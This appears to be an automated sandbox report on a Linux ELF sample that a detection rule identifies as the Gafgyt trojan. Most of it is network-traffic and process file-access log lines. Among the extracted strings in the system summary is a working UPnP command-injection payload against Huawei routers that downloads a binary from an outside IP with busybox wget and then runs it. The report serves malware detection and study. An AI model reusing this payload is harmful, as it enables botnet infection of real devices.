            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38140
            Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142
            Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38144
            Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38146
            Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
            Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
            Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
            Source: unknownNetwork traffic detected: HTTP traffic on port 46786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
            Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41782
            Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41784
            Source: unknownNetwork traffic detected: HTTP traffic on port 33524 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
            Source: unknownNetwork traffic detected: HTTP traffic on port 36960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
            Source: unknownNetwork traffic detected: HTTP traffic on port 47678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
            Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
            Source: unknownNetwork traffic detected: HTTP traffic on port 41074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37876 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
            Source: unknownNetwork traffic detected: HTTP traffic on port 43760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
            Source: unknownNetwork traffic detected: HTTP traffic on port 33536 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
            Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
            Source: unknownNetwork traffic detected: HTTP traffic on port 47666 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
            Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
            Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53780
            Source: unknownNetwork traffic detected: HTTP traffic on port 47208 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
            Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38198
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
            Source: unknownNetwork traffic detected: HTTP traffic on port 37888 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
            Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
            Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33548 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38180
            Source: unknownNetwork traffic detected: HTTP traffic on port 54478 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38182
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38184
            Source: unknownNetwork traffic detected: HTTP traffic on port 36502 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38186
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
            Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53798
            Source: unknownNetwork traffic detected: HTTP traffic on port 46808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
            Source: unknownNetwork traffic detected: HTTP traffic on port 60614 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43314 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
            Source: unknownNetwork traffic detected: HTTP traffic on port 43772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34382 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34370 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56552 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
            Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51194
            Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
            Source: unknownNetwork traffic detected: HTTP traffic on port 34428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53574 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39240 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39156 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
            Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
            Source: unknownNetwork traffic detected: HTTP traffic on port 36658 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47316 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
            Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
            Source: unknownNetwork traffic detected: HTTP traffic on port 48630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53918
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53910
            Source: unknownNetwork traffic detected: HTTP traffic on port 37972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44292 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47328 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41936
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41938
            Source: unknownNetwork traffic detected: HTTP traffic on port 50920 -> 443

            System Summary

            barindex
            Source: skyljne.arm5.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 6204.1.00007f36fc017000.00007f36fc037000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: skyljne.arm5.elf PID: 6204, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.188 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: bin/busybox
            Source: Initial sampleString containing 'busybox' found: busybox wget
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: busyboxxx
            Source: Initial sampleString containing 'busybox' found: busyboxx
            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljne.armskyljne.arm5skyljne.arm6skyljne.arm7skyljne.mipsskyljne.mpslskyljne.x86_64skyljne.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.188 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: Content-Length: /proc/proc/%d/cmdlinenetstatcurlechocatbin/busyboxbusybox wget/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/tmp/boot/proc/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystemcundicundi.*var/Condibin/Condibin/babylonetop1hbttop1hbt./root/dvr_gui//root/dvr_app//anko-app/902i13BzSxLxBxeYHOHO-LUGO7HOHO-U79OLJuYfouyf87NiGGeR69xdSO190Ij1XLOLKIKEEEDDEekjheory98escansh4MDMAfdevalvexscanspcMELTEDNINJAREALZflexsonskidsscanx86MISAKI-U79OLfoAxi102kxeswodjwodjwojMmKiy7f87lfreecookiex86sysgpufrgegesysupdater0DnAzepdNiGGeRD0nks69frgreu0x766f6964NiGGeRd0nks1337gafturasgbsigboa120i3UI49OaF3geaevaiolmao123123aOfurain0n4H34DggTrexewwasads1293194hjXDOthLaLosnggtwget
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: /tmp/skyljne.arm5.elf (PID: 6208)SIGKILL sent: pid: 1633, result: successfulJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)SIGKILL sent: pid: 2146, result: successfulJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)SIGKILL sent: pid: 6218, result: successfulJump to behavior
            Source: skyljne.arm5.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 6204.1.00007f36fc017000.00007f36fc037000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: skyljne.arm5.elf PID: 6204, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: classification engineClassification label: mal100.troj.linELF@0/1025@19/0
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6230/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6232/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6231/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6234/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6233/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6236/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6235/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/1582/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/3088/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/230/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/110/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/231/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/111/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/232/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/1579/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/112/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/233/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/1699/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/113/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/234/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/1335/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/1698/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/114/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/235/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/1334/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/1576/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/2302/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/115/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/236/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/116/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/237/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/117/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/118/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/910/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6227/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/119/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/912/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6229/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6228/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/10/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/2307/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/11/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/918/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6241/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/12/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6240/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/13/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6243/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/14/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6242/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/15/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6245/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/16/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6244/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/17/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/18/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/1594/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/120/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/121/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/1349/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/1/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/122/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/243/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/123/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/2/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/124/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/3/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/4/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/125/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/126/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/1344/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/1465/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/1586/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/127/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/248/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/128/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/249/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/1463/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/800/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6238/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/9/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/801/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6237/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/6239/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/20/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/21/cmdlineJump to behavior
            Source: /tmp/skyljne.arm5.elf (PID: 6208)File opened: /proc/1900/cmdlineJump to behavior
